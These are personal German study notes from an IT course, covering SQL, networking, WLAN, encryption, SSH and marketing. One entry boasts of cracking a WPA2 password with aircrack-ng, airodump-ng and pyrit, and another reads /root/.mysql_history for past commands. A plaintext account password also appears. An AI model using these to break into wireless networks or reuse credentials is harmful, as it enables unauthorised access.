In Firmen gibt es für Passwörter keepassx → Sicherheitsupdate sollte nicht länger als eine bis einandhalb Stunden die Woche dauern. App sql injection.

Auf die Headline achten.

Logfiles überprüfen, sonst schimpft der Chef. Log rotate, wo sie zusammengezippt werden.

Backups: Rollback, Snapshot, Datenbank unter /var/lib/mysql findet man die Tables mit den Daten.

Erst wird die Tabelle adrListe2 erstellt, dann die Tabelle aufsicht und dann die Tabelle Beliebt. Somit werden sie verknüpft, mit:

SELECT CONCAT (adrListe2.vorname, adrListe2.nachname) AS Name, aufsicht.firma, aufsicht einkommen, Beliebtheit.beliebt FROM adrListe2 JOIN aufsicht ON adrListe2.id = aufsicht.idaddr JOIN Beliebtheit ON Beliebtheit.idaddr = aufsicht.idaddr ORDER BY Name;

Die folgenden Tabellen sind ein Auszug aus mysqldump und wurden bereits verknüpft. Richtig ist es, erst die Tabellem zu erzeugen und erst dann zu verknüpfen, oder man spielt das ganze mysqldump-paket mit allen tables zusammen auf einen Rechner auf, sonst funktioniert es nicht. Hier sind die bereits verknüpften Tabellen:

CREATE TABLE `pruefungen` ( `id` int(11) NOT NULL AUTO_INCREMENT, `jahr` int(11) NOT NULL, `saison` enum('sommer','winter','sternzeit') NOT NULL, `dateiname` varchar(64) NOT NULL, `klasse` enum('FISI','WISO','FIAE') NOT NULL, `art` enum('frage','loesung') NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=188 DEFAULT CHARSET=utf8;

DROP TABLE IF EXISTS `fragen`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `fragen` ( `id` int(11) NOT NULL AUTO_INCREMENT, `idpruef` int(11) NOT NULL, `text` text NOT NULL, `nr` int(11) NOT NULL, `sub` varchar(3) NOT NULL, `punkte` int(11) DEFAULT NULL, PRIMARY KEY (`id`), KEY `idpruef` (`idpruef`), CONSTRAINT `fragen_ibfk_1` FOREIGN KEY (`idpruef`) REFERENCES `pruefungen` (`id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB AUTO_INCREMENT=655 DEFAULT CHARSET=utf8;

DROP TABLE IF EXISTS `pruefdesc`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `pruefdesc` ( `id` int(11) NOT NULL AUTO_INCREMENT, `idpruef` int(11) NOT NULL, `beschreibung` text NOT NULL, `anzFragen` int(11) NOT NULL, PRIMARY KEY (`id`), KEY `idpruef` (`idpruef`), CONSTRAINT `pruefdesc_ibfk_1` FOREIGN KEY (`idpruef`) REFERENCES `pruefungen` (`id`) ON DELETE CASCADE ON UPDATE CASCADE ) ENGINE=InnoDB AUTO_INCREMENT=68 DEFAULT CHARSET=utf8; cat /root/.mysql_history = alle sql-Befehle! Oder grep concat /root/.mysql_history

Dann kommen „ALTER TABLE“ - Befehle

TRUNCATE TABLE testi; = leert die ganze mysql-tabelle, ohne die Tabelle selbst zu löschen (case sensitive!! Casesensitive = achtet auf groß- und kleinschreibung).

Jan half mir, eine Datenbankabfrage, die sich mit jedem Refresh wiederholt, zu stoppen. Ich änderte meine MySql, damit es immer nur einen Eintrag gibt, mit Unique Key:

CREATE TABLE MeineLustigenTierchen ( TierId int(11) NOT NULL auto_increment, TierName varchar(50) NOT NULL, TierFarbe varchar(50) NOT NULL, PRIMARY KEY (TierId), UNIQUE KEY NameFarbe (TierName,TierFarbe) );

Etwas in der Tabelle NUR hinzufügen: ALTER TABLE tabelle_cd ADD Land varchar(255);

Etwas in der Tabelle ändern: ALTER TABLE adrListe2 CHANGE mail mail varchar(64) NOT NULL; Tabelle kopieren und auslagern: mysqldump -p -u arsch –all-databases > /home/bla/Dunkumente/adrListe2.txt

Und man muss auch nicht immer mysqldump machen, eine db auslagern geht auch über phpmyadmin. ..

(hier weiter machen, ja es gibt noch eine Menge mehr SQL-Stuff, der vom Ordner hierher übertragen werden sollte, z.B. wie eine foreign-key-Tabelle geht!!)

Hier sind SQL-Tabellen mit Foreign Key:

CREATE TABLE `kurse` ( `id` int(11) NOT NULL AUTO_INCREMENT, `idstudent` int(11) NOT NULL, `kursname` varchar(32) NOT NULL DEFAULT 'philosophie', PRIMARY KEY (`id`), FOREIGN KEY (idstudent) REFERENCES student(id) ON DELETE CASCADE) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1;

CREATE TABLE `noten` ( `idkurse` int(11) NOT NULL, `note` int NOT NULL, FOREIGN KEY (idkurse) REFERENCES kurse(id) ON DELETE CASCADE) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1;

Auflistung aller Kurse eines Studdenten: SELECT CONCAT (student.name,` `,student.nachname)

SELECT CONCAT (adrListe2.vorname,' ',adrliste2.nachname)AS Name, aufsicht.firma, aufsicht.einkommen, Beliebtheit.beliebt FROM adrListe2 JOIN aufsicht on adrListe.id = aufsicht.idaddr JOIN Beliebtheit ON Beliebtheit.idaddr = aufsicht.idaddr ORDER BY Name;

Primary key kann den foreign key zu 1 : n ; eins zu vielen, verknüpfen.

Virtuelle Maschine: ctrl + l = nahtloser modus select from join where and order by

Ohne Datum PHP: Was über Schleifen mit Ingo

(es gab zwischendrin eine mysql-php-prüfung) Viele Dinge wiederholen sich. Man kann sagen: Führe das doch bitte dreißig Mal aus, anstatt es hin zu schreiben -> Konzept von Schleifen. Solange → Bedingung zutrifft → Aufgabe 1 erledigen → Aufgabe n (2,3,4) erledigen → Vergleiche dann nochmal, ändere diesen Vergleichswert (Bedingung ändern) → und guck dann noch mal, solange diese Bedingung dem Vergleichswert zutrifft. while schleife: Shukongōshin ← ab hier bin ich abgegelitten zu Buddha.. grep Subnetzmaske /media/bla/Wechseldaten/Zusammenfassung_Unterricht_bis_Gegenwart2.txt cat >> /media/bla/Wechseldaten/Zusammenfassung_Unterricht_bis_Gegenwart2.txt Achtung: Switche nicht zu einem Kreis verbinden, sonst gibt es einen Broadcast-loop: you spin me right round like a record .. blinkelights- PINGSTORM Technisch detailierter erläutert: Zitat: „Als Switching-Loop oder Bridging-Loop bezeichnet man eine gefährliche Situation in geswitchten Computernetzwerken (oder in Verbindung mit mehreren Bridges), die in den meisten Situationen zu einem vollständigen Stillstand des Netzwerks durch Überlastung führt. Bei einem Switching-Loop sind zwei Netzwerkbuchsen ein- und desselben Switches direkt miteinander verbunden oder es existieren zwei oder mehr aktive Verbindungen zwischen zwei Switches. Ein Switching-Loop führt auf mehrere Arten zu einer völligen Überlastung des Netzwerks durch dauernde Duplizierung von Paketen.“

Blinkelights.

und auch die subnetzmasken besser beschreiben !!

Also, es gibt so viele intressante Themen, da ist für verneshot etc. nicht mehr Platz.

Hatte aber trotzdem nach gelesen, was ein Verneshot ist .. schlecht, oder?

27.8.2016 Rasberry Pi: Selbstlernen

- Raspian = Debian-Betriebssystem, für den Raspberry pi entwickelt.

Ein Punk sagte mal, wieso er so dreckig ist: Denk an den Erfolg der Pockenimpfung; erst über die Infektion Kuhpocken konnte der Mensch eine Reistenz entwickeln! Er ist mit dem Dreck super gesund, weil abgehärtet!

Nachbarschaftsstress: mediation soll gut sein.

28.8.2016: OSI .. Doch nicht am Sonntag ..

Die zweite, die Sicherungsschicht, ist der Ort, wo die Daten in einem Koffer kommen, der noch mal extra adressiert wird ??

Das ARP. Das AdressResolutionProtokoll, das Adress-Lösungs-Protokoll: Wo ist die Hardwareadresse? Wo ist die Netzwerkadresse? Im Client? Im Server? Im Modem? Im Switch? Los, sag‘s mir !! Und wie kann es überhaupt eine Software geben, die eine Hardwareadresse bestimmen kann? Wo kann hierbei die Rede von einer Lösung sein ?? In der dritten Schicht des OSI-Modells, in der „Netzwerkschicht“ .. das hat den token-ring – HUGH - aus der Sicherungsschicht, der zweiten, schon durch !! Aber koscher klingt das ARP nicht !

How DNS works ..

..excellent for visual learbers! https://www.youtube.com/watch?v=2ZUxoi7YNgs

29.8: Marketing VirtualBox wird IMMER von Konsole aus gestartet, in meinem Lubuntu – und das als User, NICHT als root! Kali-Linux-Image ist im Download bereits ..

Befehl, um zu schauen, welchen Kernel man hat: uname -r auch cooler befehl: lscpu

30. 8.:Noch mehr Marketing

..oh oh, große LÜCKE... 1.9.: Fertigstellung SQL Projekt Prüfungs DB 2.9.: Abgabe SQL Projekt Prüfungs DB 5.9.: IFA Messebesuch

MAC-Broadcast

IP-Broadcast

6.9.: Netzwerke Hardware: Kabel, OSI Schicht 1, Funk mit Hr. Rüdiger

IPv6 wir lernten, wie man sie an den nullen verkürzt und so .. . ipv6-Adressbereiche die ipv6-Adressen sind 128 bit groß; mac = 48 bit; ip/mask = 32 bit

IPv6 und die vier Netze und das Rechnen mit hexadezimalen Zahlen.

Die Verdoppelung von Subnetzen über die Erhöhung des Hostanteils einer Subnetzmaske um 1. Wenn man das sagt, kann man mir garantiert sagen, wieviele Subnetze insgesamt mit einer Maske möglich sind... Mir das evtl. In einem Tutorial erklären lassen..

Google hilft nicht immer Aufgaben des Netzwerks: Verbindung, Steuerung, Datenaustausch, DB, Internet, Telefon, Protokoll, Remote Desktop, Video/Audio. Alles ist TCP/IP, was eine protokollfamilie ist. Unterschied physikal/log. Verbindungen. GSM, LTE sind auf der untersten Schicht anders (andere Protokolle).

Digitalübertragung#: Immer ein sauberes Bild, weil wenn etwas undefiniert ist, kommt es in den Müll, von den pakten.ustände, die man festlegen kann - immer Pakete! Analogübertragung#: Zwischen zwei Punkten kann man unendlich viel schalten. Da kann alles eingestreut sein. ISDN: Digital, aber noch leitungsvermittelt. Internet: NUR Pakete. Der Sender und der Empfänger sind die einzigen, welche die Pakete zusammenkriegen, (und vielleicht noch ein als Proxy getarnter Man-in-the-middle im DHCP-Netz, oder?) Jedes Paket hat einen Absender und Adresse aufgestaempelt und wird zig mal umgepackt, vom ethernetframe in das lwl-frame, usw..

Schicht 1: Kabel aus Kupfer, oder Lichtwellenleiter, oder funk (WLAN, Mobil, Satellit)..

LWL: Monomode (Laserlicht): Orange.Reichweite über 100km. Selbst über weite Strecken bleibt der Punkt in der Mitte und klar. Multimode(LED-Licht): Ist blau und hat Lichtversatz.

LWL LichtWellenLeiter sind dieelektrische Wellenleiter, mit welchem elektromagnetische Strahlung vom ultravioletten bis in infraroten Spektralbereich übertragen werden kann.

Kupfer: Alle 100 meter ein repeater, Glasfaser: mehr als 100 m!

Der Nichtleiter verhindert elektrischen Schluss (galvanische Trennung). Auch für Audio gut (reines Signal). Jüngere elektriker nehmen, weil die Datenkabel hatten und die vorsichtig verlegt werden.. werden getrennt verlegt vom Strom im Steg im Schacht.

POE (Power over Ethernet) nicht möglich.Endbestückung wird daher mit Kupfer gemacht.

„LWL sind immer doppelt“ .. in welchem Zusammenhang??

Kupfer: OZ: 29, 4. Periode .. Verlegekabel: Verlegekabel sind fest im Gebäude installiert. Die Kupferdrähte sind dicker.

Patchkabel: (vom engl. Zusammen schalten: to patch). Auch Rangierkabel; ist meinst vorkonfektioniert. Ursprünglich 50cm – 1 Meter. Adern: Kupferlitzen: Die Litze ist ein aus Einzeldrähten geflochtener Draht, massive Drähte. Entweder eins zu eins verdrahtet, oder Adernpaare sind gekreuzt (Crosskabel). Sie wird von der Isodrahtzange zusammen gedrückt.

Bei Übergang: vergoldete Stecker. Gold oxidiert nicht, leitet aber schlechter als Kupfer.

Telefondose: fehlt metallische Abschirmung! Netzwerk hat 16 Anschlüsse, ISDN nur 8 Anschlüsse.

Halogenfrei muss sie sein, in öffentlichen Räumen ist das Pflicht!

Im Schaltschrankbau werden halogenfreie Kabel gerne eingesetzt, um einen zusätzlichen Schutz der wertvollen Komponenten zu bieten, weil halogenhaltige sie im Brandfall Geftstoffe fei setzen (Säuren und Dämpfe), die Metall zerfressen. Halogenfrei: Brandsicher. 2. Kategorien beim Kabel Unterscheidung in der Frequenz. Wie oft kann ich ein- und ausschalten, hängt von der Kabel – Übertragungsgeschwindigkeit – ab.

..

Twisted-pair-Kabel: cat 6 -7a bis 10Gbit/s. Unterschiedlich verdrillt.

Cat 6 bis 500 Mhz .. Kunden bestes Kabel aufschwatzen.

Je dicker das Kabel, desto geringer der Widerstand .. siehe AWG-Schablone!

Immer das beste Kabel verlegen, auch, wenn es 10 euro mehr kostet, wegen technischer Neuerungen& Änderung des Kunden-Verhaltens.

-Länge: 100 MeterStandard: 90m verlege + 10 meter patch.

-Schirmung: Folie, Geflecht, STP, S/FTP..

Farbe: Grün, Orange, Blau, Braun.

Wo zwei Kabel zusammen laufen: Patchfeld Bei AWG sogar 27 nehmen.

Wellenimpedanz: (Gegenwiderstand be Frequenz ..): Zitat: „Der Wellenwiderstand, auch die Wellenimpedanz oder die Impedanz, ist eine Eigenschaft eines Mediums, in dem sich eine Welle ausbreitet. Das Verhältnis von reflektierter und transmittierter Amplitude der Welle an einer Grenzfläche wird durch die Wellenwiderstände der beiden Medien bestimmt.“

Das mit der subatomaren Ebene kann man über eine Apparatur nach vollziehen, welche die Wellenimpedanz misst, weil in jedem Medium breitet sich eine Welle unterschiedlich aus. Oder?

Je höher die Spannung(Wellen), desto stärker der Widerstand(induktiver Widerstand)! Sie können anzeigen, wo der Bruch liegt = Netzwerkmessgerät. Länge,ohmscher widerstand, next, fext, Dämpfung, ACR, ELFEXT, Return loss, NVP, Propagation Delay, Delay Skew.

Dann ging es ums Übersprechen.

Weißes Kabel: Rückkanal (zur Überprüfung) .. 22/24 nimmt man in der Regel . .Wieso??

Übersprechen: Anstatt ein Kabel geht das Signal über mehrere Kabel.

Zitat: „Übersprechen oder Nebensprechen, englische Bezeichnung crosstalk, abgekürzt XT, ist ein Begriff aus der Telefonie und bezeichnet ursprünglich einen Effekt, durch den man am Telefon ein anderes Gespräch leise mithören kann – daher der Name.“

Glasfaser: Keine Übersprechungsprobleme.

POTENTIOMETER

Bifilare Wicklung (wenn man keinen induktiven Widerstand haben möchte): In der Netzwerktechnik wird dafür ein Adernpaar verdrillt, um ein Wenig den Widerstand und elektromagnetische Störung zu beseitigen.

Schauen bei Google: Twisted Pair Kabel. Es wird nicht nur zwischen zwei computern verwendet, Das ist auch als Verbindung zwischen routern in Nutzung.

Die IP wird nicht zwingend versorgt (früher). Wieso das?? Schicht 1: Kabel aus Kupfer, oder Lichtwellenleiter, oder funk (WLAN, Mobil, Satellit)..

7.9.: Netzwerke: WLAN, Sicherheit, Verschlüsselung, Funk …

Digital ist im Funkraum ist logisch nicht möglich. Kondensatorspulglied lässt einen Frequenzbereich (Frequenzband) durch.

Frequenzen kann man nie sauber trennen.

Es gibt 250 Frequenzbereiche. Wo?

Analoge Welle kann sich unbegrenzt in alle Frequenzen übertragen.

Lichtantennen sind ein wenig besser.

Jede Frequenz = anderes Funkverhalten.

Mit einer Picoone-Antenne kann WLAN bis zu 3,5 km weit reichen. Ubiquity Pico Station Richtfunk WLAN: Es gibt ein Limit. 3,5km.

WLAN = WirelessLocalAreaNetwork

IEEE 802.11 = Standard unter WLAN´s. Mikrowelle sollte nicht auf 2,4 Ghz laufen!

Bündelung von Frequenzen = höhere Übertragungs-Rate .. Frequenz – und Sendeleistungsregulierung. Führt doch eher zu mehr Widerstand, oder?

WLAN-Standards auswendig lernen802.11c etc...

Übertragungsraten werden runter gesetzt .. wieso??

2, 46 Ghz nur richtwert Bei wlans. Geht von 2412 – 2432.

Es gibt 2,4 und 5 Ghz. Ad-Hoc: Direkt zum anderen Client von wlankarte zu wlankarte. Infrastrukturmodus: Angemeldet wird sich imer am Accespoint, nicht am Router (accesspoint zwar auf Router drauf gelötet, Accesspoint mit internem switchport unabhängig).

Accesspoint stellt Netze (ssid) bereit, man kann sie unterdrücken. Dann Verbindungsanforderung, Frequenzen aushandeln (und kanal), Standard aushandeln z.B. 22 Mbit/s. Auf niedrige Geschwindigkeit auch Duplex etc .. ausgetauscht.

Freifunk: vermaschtes Netz.

Freifunk berlin: Alles wird aus Schweden (VPN) gerootet. Nutzen vollvermaschte Topologie.

Ohne Datum Verschüsselung: ..und Ascii-Zeichen

Schlüssel so lang und gut wie möglich.

Heute: Schlüssel werden generiert. Hardwareseitig.

Es gibt asymetrische und symetrische Schlüssel.

Client verschlüsseln:Beide den

gleichen Wert Telefon: Zusätzlicher Kanal, wo Schlüssel übertragen werden.

Zertifikate.

Diffie-Helmann-Schlüsselaustausch.

WLAN selbst hat keine IP & Mac-adresse .. oder ?? Nur eine Mac-Adresse.

Urheberrechtlicher Zutritt: Berechtigung nur über Zertifikat (es gibt zehntausende). Quellcode wird auch verschlüsselt.. WPA Enterprise: Kann mich auch über Domainlog bei Mailprovidern einloggen. VPN = Punkt zu Punkt – Verschlüsselung: Auf Schicht 3. WLAN: Schicht 1.

Es gibt keine direkte Verbindung zwischen WLAN und VPN, es sind zwei verschiedene Netze. Man kann sie aber verknüpfen.

Im wlan kann man kein vpn aufbauen, aber über wlan kann man gehen.

Asymetrisches Verschlüsselungsverfahren privater Schlüssel öffentlicher Schlüssel Werte in Bitzahl ineinander gereiht.

Beide werden zusammengeführt und daraus der neue Schlüssel berechnet.

Dann ein Beispiel mit Zifferfolgen, öffentlichem Wert, buchstaben werden Zahlen zugewiesen, (9 hoch 8 mod 13 <= B) usw. “Zwei Funktionen, die nur eine gemeinsame Schnittstelle haben”

Dieses Verfahren: Ständig neue Schlüssel generierbar.

Gefährlich wird's wenn man den Key bekommt. Dann kann man sich ins Netz einklinken. - Jeder Client hat einen eigenen Schlüssel, aber nicht jedes WLAN.

Ein Zertifikat hat eine Matheaufgabe(Algorithmus) und Hashwert, daraus wird Schlüssel generiert, bei dem die verschlüsselte Mail ankommt, der kriegt auch das Zertifikat.

PIDGIN unter Debian einrichten!! (schauen, wie es damals in der hackers lounge auf ubuntu eingerichtet worden ist).

Zertifikat nicht mit den Schlüssel verschicken.

Dann gibt es noch unterschiedliche mathematische Verfahren. .. wozu? Für was?

Man kann auch MAC's fälschen. Aber nur sehr schwer.

Supersicherpasswörter: ASCII-Zeichenblöcke. Alt-Taste + ASCII – Kombi im Nummern-Block eingeben.

Nein, strg + shift die ganze zeit drücken, kurz u, dann hexwert des zeichens eingeben, dann strg + shift los lassen. Ɖ ♥ dƗ թ Überlagerung bei Digital geht nicht.

Es muss so lange (34 Byte) senden, bis es angekommen ist. Bei Kollision hören alle auf, zu senden.

Würfeln Zufallszahl. Diese bestimmt die Wartezeit.

Bei LWL gibt's keine Kollision, weil Punkt zu Punkt (Hat nichts mit dem ppp-Protokoll zu tun). ISDN .. und noch wiederholen, was wir mit Ingo/Rüdiger/Markus früher in dieser Hinsicht hatten.

UMTS: Analoge Welle.

Wlan: langsamer als Kabel.

Wlan und schnell eigentlich für den Consumer-Bereich gedacht.

IEEE 802.11 = Standard unter WLAN´s.

Wlan sendet auf anderen Frequenzen als Radio, Rundfunk .. wlan-Standard ist 2,4 Ghz. Also im Mikrowellenbereich.

Lichtfunk: “Ist bei einem Lichtfunkempfänger die Fotodiode angeschlossen, so ist jede Raumbeleuchtung störend. Glühlampen und Leuchtstoffröhren erzeugen ein starkes, mit 100 Hz pulsierendes Licht. Um diese Störungen zu umgehen, benutze ich eine einstellbare Beleuchtung mit einer weißen LED. Stark genug für eine geringe Sicht und so schwach, dass die Fotodiode nicht geblendet wird.”

Frequenzband: Ein Frequenzband bezeichnet Frequenzbereiche, also Teilbereiche des elektromagnetischen Spektrums der zur technischen Kommunikation verwendeten elektromagnetischen Wellen.

CSMA hat mit IEEE802.3 Wlan zu tun.KOLLISION, ohne CSMA Pakete machen bum bum bum. CSMA is Paket nicht machen Bum!

8.9.2016: Netzwerke: Kollisionserkennung, VLAN, Netzwerksimulation ...

9.9. 7h früh: Juhuu! WPA2-Passwort geknackt! Es hatte zwar lange gedauert, aber letztlich konnte ich auch Buchstaben mit kali-linux, airmon-ng, aircrack- ng, aurodump-ng und pyrit entcrypten!!! (das geht schneller, wenn man das Passwort ganz vorne in die password.txt stellt)

9.9.2016: Hackers-Lounge: Wiederholung ssh-Autologin und Pidgin eingerichtet mit Martin

SSHFS verwenden:

Richtig cool unter der Hand ..

Wie man ohne Passwort sich auf den Remote-Server einloggen kann: ssh-keygen -t rsa -b 4096 dann immer enter drücken .. Dann: ssh-copy-id [email protected] -p 22220

Dann noch das pw eingeben und dann: funktioniert‘s ..

Wenn sshfs nicht auf dem Server: Dann könnte man den Admin fragen, …

Aber irgendwas fehlt im ssh-autologin .. HEY, der alte Stick??

Pidgin eingerichtet mit Martin: apt install pidgin-otr

Dann hatte ich unter „konten verwalten“ und „hinzufügen“ das Protokoll „xmpp“ ausgewählt, mein Namen:phantasy, lokalen alias:phantaski, domain:datenknoten.me, resource:lala. Passwort-Feld frei lassen. Dann öffnet sich der Browser und datenknoten.me will, dass ich mich registriere, das mache ich, also gebe dort auch die daten ein, die ich unter pidgin schon eingegeben hatte. DANN ein passwort eingeben und eine echte-email-Adresse eines realen mail-accounts angeben. Auf den mail-account einloggen, dort über den Link mich authentifizieren und mein User wäre eingerichtet.

Pw: labor6boss6

Dann „Buddys hinzufügen“. Name des Buddys: Dort sollte der pidgin-User sagen, wie er heißt. Harry ist der ältere, der auch immer in der hackers-lounge ist. .. [email protected] Dann doppelklick auf den generierten namen. Dann sollte man nebeneinander sitzen, der andere soll sich auf pidgin einloggen, dnn ist man noch nicht verifiziert (rechts unten vom fenster). Buddy autorisieren. Dort geht man auf fingerprint und vergleicht die beiden Schlüssel, wechselt auf „ich habe“ Dann hat man eine private, gesicherte Verbindung !!

Martin ist Kommunikationselektroniker, Fachrichtung Funktechnik, nicht Systemelektroniker .. ! theoretische Informatik beschreibt Probleme um sie dann zu lösen. z.B. Ampel: braucht man dafür einen Computer? Nicht zwangsläufig, Zustandsautomat funktioniert auch. Chomsky-Hierarchie ..

Assembler = Sprache für einen unbeschränkten Automaten.

Mit Zustandsautomaten gibt es keine Unbeschränktheit. Bei Zustandsautomaten ist nur Mikroprogrammierung möglich.

Martin sagte, eine cpu ist auch ein Zustandsautomaten. .. aber ein sehr komplexer.

Früher hatten Prozessoren nur eine ALU.

Martin: Anrufbeantworter sind Toaster, nur 1 bit geht.

..

Zu MC: in die .bashrc vom user . /usr/lib/mc/mc.sh eingeben (extra mit Leerzeile am Schluss).

Dann eine neue shell aufmachen. Dann mc aufmachen dann beim terminalfenster „bearbeiten“ unter „einstellungen“ die dritte registerkarte tastenktürzel für f10 deaktiveren! Wenn man dann die f10-taste drückt, bleibt man im verzeichnis stehen, dass man im mc ausgewählt hatte ..

Mc man um das manual aufzurufen, dort: shift + f7 ruft slash auf, um gezielt zu suchen ..

… will man verschlüsselt email schreiben, sollte man erst mal apt install thunderbird enigmail installieren.

Dem Thunderbird sollte man den zugriff auf den mailprovider (gmail) zulassen und die eimails herunter laden lassen. Dann gibt es in thunderbird rechts oben das stilisierte schrift-menü, wo man enigmamail/einrichtungs- assistent auswählen kann.

Privaten schlüssel generieren passwort eingeben, dann wird der private schlüssel generiert.

Dann „Enigmail/schlüssel verwalten“. Dann sagt dir der Kommunikationspartner die email, unter der sein öffi-schlüssel ist. Dann, wenn der öffi-schlüssel gefunden ist, häkchen hinter machen. Unter „write email“ die email des Kommunikationspartners eingeben, „Nachricht wird verschlüsselt“ kommt automatisch.

Protokoll: openPGP-Format .. surf solar - fuck buttons

.. sshfs für windows.

Die virtualbox kann ich auf einen zustand zurück rollen, bevor ein programm installiert wird.

Snatshot (unter sicherungspunkte) anlegen, kann man benennen .. und wenn dann was schief läuft, braucht man nur snatshotz zu löschen!

.. nanolichtsekunde: 13cm.

– mit windows sshfs nutzen: Filezilla.

Auf linux-system apt install openssh-server installieren mit netstat -tulpen prüfen, ob 22 port offen ist.. dann mit ifconfig die ip des linuxxsystems herausfinden und mit filezilla unter smtp dort die linux-ip + 22-port angeben, Verbindung steht!

Achtung: rekonstruiert scp -P 22220 -r /var/www/max/Mkhost/img/VFX_Meine-bunten-Haeuser-in-San-Sebastian-auf-La- Gomera3.jpg [email protected]:/public_html/

DAS ist der richtige Befehl: scp -P22220 /home/max/Schreibtisch/password.txt [email protected]:public_html/

Und vom Server zum Desktop: scp -P22220 [email protected]:public_html/password.txt /

Ganze Verzeichnisse kann man mit „-r“=rekursiv rüber kopieren: scp -r -P22220 [email protected]:public_html/ /var/www/Mkhost/Mkhost_27-9-2016/ ein paar Tage später hatte ich die password.txt manipuliert, bzw. das Paswort vom WLAN an eine der ersten Stellen gesetzt und dann innerhalb von wenigen Sekunden da Passwort „entschlüsselt“.

FONTS: /usr/share/fonts/truetype# Dort kann man fonts einfügen, und man muss einen befehl eingeben dann muss man fc-cache eingeben, um den font zu aktivieren (vermute ich)

Marketing mit Hr. Wartenberg (Unterricht vom 29.8.-30.8. und 12.9.-13.9. zusammen gefasst):

Marketing: Bescheißen auf hohem Niveau. Menschen manipulieren. Wirtschaftskrieger → Schule in Frankreich, stammt aus dem militärischen, z.B. Clausewitz von Krähe.

Jedes Problem ist eine ungenutzte Chance.

Marketing wird als marktorientierte Unternehmungsführung

verstanden, die alle relevanten Unternehmensaktivitäten auf die Wünsche und Bedürfnisse von Anspruchsgruppen ausrichtet.

Event-Marketing: Disco mit Marke, um Lebensgefühl zu geben. Aufladen der Marke!

McKinsey und Company: Marketing ist die Ausrichtung aller Unternehmensinstrumente am Kunden.

Schritte im Planungsprozess: 1. Analyse Die fünf Leute, mit denen man sich am meisten umgibt. 2. Planung 3. Umsetzung 4. Evaluation (Zielkontrolle). Macht kurze Umfrage nach Party. Dann schließt sich der Kreis! Ohne Marketing muss man nicht anfangen, als Gründer. Kunde muss hoch gehoben, gestreichelt werden (Apple-Kundenservice, als Beispiel)

Der Marketing-Mix (Für einen Businessplan): Die „Vier P‘s“ im Marketing:

Price = Preispolitik bieten Sie dies zu angemessenen Konditionen an (Centbeträge)

Promotion = Kommunikationspolitik stellen Sie sicher, dass Ihre Zielgruppe weiß, dass Ihr Angebot existiert und einen Mehrwert liefert. (An: Hausfrauen. Für: besseres Backen. Über: Fernsehwerbung) Testimonials: Stars werben.

Place = Distributionspolitik = Vertrieb vertreiben Sie es über die richtigen Vertriebskanäle (Dr. Oetker: Supermärkte. Oder?)

Product = Produktpolitik = finden Sie das richtige Angebot für Ihre Zielgruppe. (Backpulver)

Zitat: „Achten Sie bei der Ausarbeitung für den Marketingmix darauf, dass Sie in einem ersten Schritt die 4 P's nacheinander durcharbeiten. In einem zweiten Schritt sollten Sie dann Ihren Marketingmix kritisch prüfen, ob die einzelnen P's aufeinander abgestimmt sind.“

Die vier P‘s bilden konkrete Maßnahmen: Zitat: „Ausgehend von den Unternehmenszielen haben Sie die Strategie für Ihr Unternehmen festgelegt. Nun sollten Sie die konkreten Maßnahmen bestimmen.“

Monopsum: ein Kunde, mehrere Zusteller. Kunde: militär, Deutsche Bahn ..

Mee-Too-Produkte. Functional food: Essen mit religiöser Aussage.

„Reason Why“, Darstellung der Begründung → Garantieerklärung, Forschungsergebnisse .. Tonality/ Flair → Rituale, Farben, Stilrichtungen, Typografie, Töne, ausstattung

Jede Entscheidung ist besser als keine Entscheidung, von Kriegsmarschall Moltke

Consumer benefit: Dabei wird unterschieden zwischen Grundnutzen und Zusatznutzen Geht bewusst auf die Bedürfnisse der Zielgruppe ein.

Dann gab es eine (unbenotete) Gruppenarbeit.

12.9:

CRM/ERP = Datenbanken, wo Kundendaten gespeichert werden.

Produktpolitik Definition: Alle Maßnahmen, die der Gestaltung des einzelnen Produktes (Funktion, Form, Verpackung) sowie des Güterangebots (Sortimentspolitik) dienen.

Dann steht da noch: „Markenmanangement“, „Innovationsmanagement“. Produktkern, Zusatzeigenschaften Verpackung/Gestaltung Basisdienstleistungen Zusatzleistung Marke

Produkte-Typologien

Instrumente der Produktpolitik: Namensgebung(z.B. Name Pajero schlecht f. Spanischen Markt), Sortimentspolitik(Betriebssystem ohne Apps sind blöd), Produkteigenschaften, Verpackung, Zusatzleistung(z.B. johnny walker mit moorhuhn), Markenpolitik

Entscheidungen in der Produktpolitik: Gestaltung des Produktes, Gestaltung der Verpackung, Entscheidung, oder Erscheinung des Markenbildes?, Einstellung des Produkts.

Zentrale Fragen: Innovationsmanagement = Es gibt einen gefühlten Prozess (Erfindung als eines Angestellten gehört der Firma).

.. Und mehr ..

Gutes Marketing: Vor der Produktion

Horizontale und vertikale Produktdifferenzierung

Diversifikation: Ist die Aufnahme neuer Produkte, die in keinem Zusammenhang mit dem bisher. Produktpr. Stehen.

Produktbündelung ..

Produktelimination.

Analysen zur Entscheidungsfindung

Lernkurveneffekt: Statischer Skaleneffekt

Es gibt das Pareto 80/20 Prozent-Prinzip, wo man mit nur 20 % Leistung 80% erreichen kann ??

Innovators: kleine und wichtige Zielgruppe.

Es gibt die Einführungsphase, Gaußsche Glockenkurve (Die Normal- oder Gauß-Verteilung ist ein wichtiger Typ stetiger Wahrscheinlichkeitsverteilungen), Statischer Skaleneffekt (Produktlebenszyklus).

Kommunikationspolitik Apple &Google sind die teuersten Marken der Welt

Ambient-Media; ist wie Guerilla-Marketing. Man wird extrovertiertes, betroffenheits-Werben, Besteck auf Mülltonne aaufgeklebt.

Mindset ist = wenn die Menschen glauben, dass es keinen Grund gibt, sich zu ändern. Hr. Wartenberg gibt Bettlern kein Geld, weil sie sonst so gerade am Leben gehalten werden, ohne Notwendigkeit, sich zu ändern (das fiel mir schon als Kind auf, dass Erwachsene alle „gleich“ aussehen).

Historisches: Marketing der 50ies, Regionale einzelhändler, Loigistik im vorderhgrund. Absatzorgane: Damit das Absatzorgan die Kunden findet. Vertriebsorgane – unternehmensintern .. - Organisation – Vertriebsaußendienst. Der vertriebsinnendienst administrativ und anderes …

